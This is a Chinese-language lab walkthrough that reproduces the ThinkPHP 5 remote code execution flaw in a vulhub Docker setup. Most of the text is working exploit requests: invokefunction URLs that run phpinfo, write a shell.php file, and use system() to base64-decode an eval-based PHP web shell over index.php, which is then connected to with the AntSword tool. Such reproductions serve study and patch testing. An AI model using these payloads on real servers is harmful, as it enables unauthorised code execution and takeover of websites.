漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。
环境搭建
启动环境
切换目录到vulhub/thinkphp/5-rce下
启动容器
docker-compose up -d
查看端口
docker ps
端口为:8080,访问网站,搭建成功
漏洞复现
(1)输出关于 PHP 配置的信息
http://172.16.1.15:8080/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
(2)whoami
(3)还可以将php代码写入文件
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>
接着访问shell.php
利用蚁剑工具getshell
由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功
我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式
将代码进行base64加密
aa<?php @eval($_REQUEST['attack']) ?>bb
将一句话写入index.php
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi
| base64 -d > index.php
成功回显出aabb,说明是加入到了index.php里了
开始用蚁剑,URL地址填写我们一句话木马的位置
注意要选择char16和base64
测试连接成功